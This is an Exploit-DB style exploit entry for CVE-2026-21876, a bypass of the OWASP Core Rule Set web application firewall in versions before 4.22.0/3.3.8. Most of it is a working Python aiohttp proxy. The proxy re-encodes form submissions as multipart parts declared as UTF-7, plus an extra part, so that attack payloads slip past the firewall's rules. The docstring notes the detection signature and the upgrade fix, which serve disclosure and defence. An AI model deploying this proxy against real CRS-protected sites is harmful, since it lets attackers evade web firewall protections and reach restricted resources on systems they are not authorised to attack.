- What: coreruleset 4.21.0 has a firewall bypass vulnerability
- Impact: attackers could bypass security rules and access restricted resources
coreruleset 4.21.0 - Firewall Bypass EDB-ID: 52558 CVE: 2026-21876 EDB Verified: Author: ANONIMICERUM Type: WEBAPPS Exploit: / Platform: MULTIPLE Date: 2026-05-13 Vulnerable App:

# Exploit Title: coreruleset 4.21.0 - Firewall Bypass
# Date:* 04/08/2026*
# Exploit Author: Daytrift Newgen
# Vendor Homepage: https://github.com/coreruleset
# Software Link: https://github.com/coreruleset/coreruleset
# Version: < 4.22.0/3.3.8
# Tested on: Fedora, MacOS
# CVE : CVE-2026-21876
"""Forwarding HTTP proxy that rewrites form bodies before relaying them.

Every request is relayed to ``UPSTREAM``.  Requests whose Content-Type starts
with ``application/x-www-form-urlencoded`` are re-encoded as
``multipart/form-data`` in which each field value is sent as a separate part
declaring ``charset=utf-7``; everything else is passed through unchanged.
Per the ``Version`` line above, the affected CRS releases are those before
4.22.0 / 3.3.8, so upgrading is the fix.  From a defensive standpoint the
observable signature of this traffic is a multipart body whose parts declare
``charset=utf-7`` and carry ``+...-`` shifted sequences; treating such parts as
anomalous (or normalising them before rule evaluation) is the corresponding
detection/mitigation.

NOTE(review): the ``cgi`` module was deprecated by PEP 594 and removed in
Python 3.13, so ``from cgi import parse_header`` fails on current interpreters.
"""

import base64
import os
from cgi import parse_header
from urllib.parse import parse_qsl

from aiohttp import web, ClientSession, MultipartWriter
from yarl import URL

# Target
# Scheme/host/port of the server the proxy relays to; the request's own path
# and query string are grafted onto it in _make_upstream_url.
UPSTREAM = os.getenv("UPSTREAM", "http://host:8083")

# Header names (lower-cased) that are never copied in either direction.
HOP_BY_HOP_HEADERS = {
    "connection",
    "keep-alive",
    "proxy-authenticate",
    "proxy-authorization",
    "te",
    "trailer",
    "transfer-encoding",
    "upgrade",
}


def _make_upstream_url(request: web.Request) -> str:
    """Return the upstream URL for *request*.

    Takes scheme/host/port from ``UPSTREAM`` and replaces the path and query
    with those of the incoming request.
    """
    base = URL(UPSTREAM)
    return str(
        base.with_path(request.rel_url.path).with_query(request.rel_url.query)
    )


def _copy_headers_for_upstream(request: web.Request) -> dict[str, str]:
    """Return the request headers to forward upstream.

    Drops hop-by-hop headers, ``Host``, ``Content-Length`` and
    ``Content-Type``; the client library recomputes the last two for the
    (possibly rewritten) body, and ``handle`` sets Content-Type explicitly
    when the body is rewritten.  Original header casing is preserved.
    """
    headers: dict[str, str] = {}
    for k, v in request.headers.items():
        lk = k.lower()
        if lk in HOP_BY_HOP_HEADERS:
            continue
        if lk in {"host", "content-length"}:
            continue
        if lk == "content-type":
            continue
        headers[k] = v
    return headers


def _utf7_encode(text: str) -> bytes:
    """Return *text* as UTF-7 where every character is a shifted sequence.

    Each character is individually encoded as UTF-16-BE, base64-encoded with
    the ``=`` padding stripped, and wrapped as ``+<base64>-``.  This differs
    from the usual RFC 2152 encoder output in that plain ASCII characters are
    not left as direct characters.  Returns ``b""`` for an empty string.
    """
    result = b""
    for char in text:
        utf16_bytes = char.encode('utf-16-be')
        b64 = base64.b64encode(utf16_bytes).rstrip(b'=')
        result += b'+' + b64 + b'-'
    return result


def _form_urlencoded_to_multipart(
    body: bytes, content_type: str
) -> tuple[MultipartWriter, str]:
    """Rebuild a form-urlencoded *body* as a multipart/form-data writer.

    Args:
        body: raw request body bytes.
        content_type: the request's Content-Type header; its ``charset``
            parameter (default ``utf-8``) is used to decode *body*.

    Returns:
        ``(writer, content_type)`` where *content_type* is the writer's own
        multipart Content-Type (including the boundary).

    Undecodable bytes become U+FFFD (``errors="replace"``) before the values
    are re-encoded.  Blank values are kept (``keep_blank_values=True``).
    """
    _, params = parse_header(content_type or "")
    charset = params.get("charset", "utf-8")
    text = body.decode(charset, errors="replace")
    pairs = parse_qsl(text, keep_blank_values=True, strict_parsing=False, encoding=charset, errors="replace")
    mp = MultipartWriter("form-data")
    for key, value in pairs:
        # One part per field; the value is UTF-7 and labelled as such.
        part = mp.append(_utf7_encode(value))
        part.headers["Content-Type"] = "text/plain; charset=utf-7"
        part.set_content_disposition("form-data", name=key)
    # Extra fixed part named "aBdC401" with body "a".
    # NOTE(review): its placement relative to the loop is inferred from the
    # collapsed source -- confirm whether it is appended once or per field.
    part2 = mp.append('a'.encode("utf-8"))
    part2.set_content_disposition("form-data", name="aBdC401")
    part2.headers["Content-Type"] = "text/plain; charset=utf-8"
    return mp, mp.content_type


async def handle(request: web.Request) -> web.Response:
    """Relay *request* to ``UPSTREAM`` and return the upstream response.

    Form-urlencoded bodies are rewritten via ``_form_urlencoded_to_multipart``
    and the forwarded Content-Type replaced accordingly; other bodies are sent
    verbatim.  Redirects are returned to the caller rather than followed, and
    hop-by-hop headers are stripped from the upstream response.
    """
    upstream_url = _make_upstream_url(request)
    headers = _copy_headers_for_upstream(request)
    content_type = request.headers.get("Content-Type", "")
    body = await request.read()
    data = body
    if content_type.startswith("application/x-www-form-urlencoded"):
        mp, mp_content_type = _form_urlencoded_to_multipart(body, content_type)
        data = mp
        headers["Content-Type"] = mp_content_type
    async with request.app["session"].request(
        method=request.method,
        url=upstream_url,
        headers=headers,
        data=data,
        allow_redirects=False,
        # proxy="http://127.0.0.1:8080",
    ) as resp:
        resp_body = await resp.read()
        response_headers = {
            k: v
            for k, v in resp.headers.items()
            if k.lower() not in HOP_BY_HOP_HEADERS
        }
        return web.Response(
            status=resp.status,
            headers=response_headers,
            body=resp_body,
        )


async def on_startup(app: web.Application) -> None:
    """Create the shared outbound ClientSession used by ``handle``."""
    app["session"] = ClientSession()


async def on_cleanup(app: web.Application) -> None:
    """Close the shared ClientSession on shutdown."""
    await app["session"].close()


# Accepts request bodies up to 50 MiB; every path and method goes to handle.
app = web.Application(client_max_size=50 * 1024 * 1024)
app.router.add_route("*", "/{tail:.*}", handle)
app.on_startup.append(on_startup)
app.on_cleanup.append(on_cleanup)

if __name__ == "__main__":
    # Local proxy
    # NOTE(review): binds all interfaces, so anything that can reach port 8085
    # can relay through this process to UPSTREAM; 127.0.0.1 would limit that.
    web.run_app(app, host="0.0.0.0", port=8085)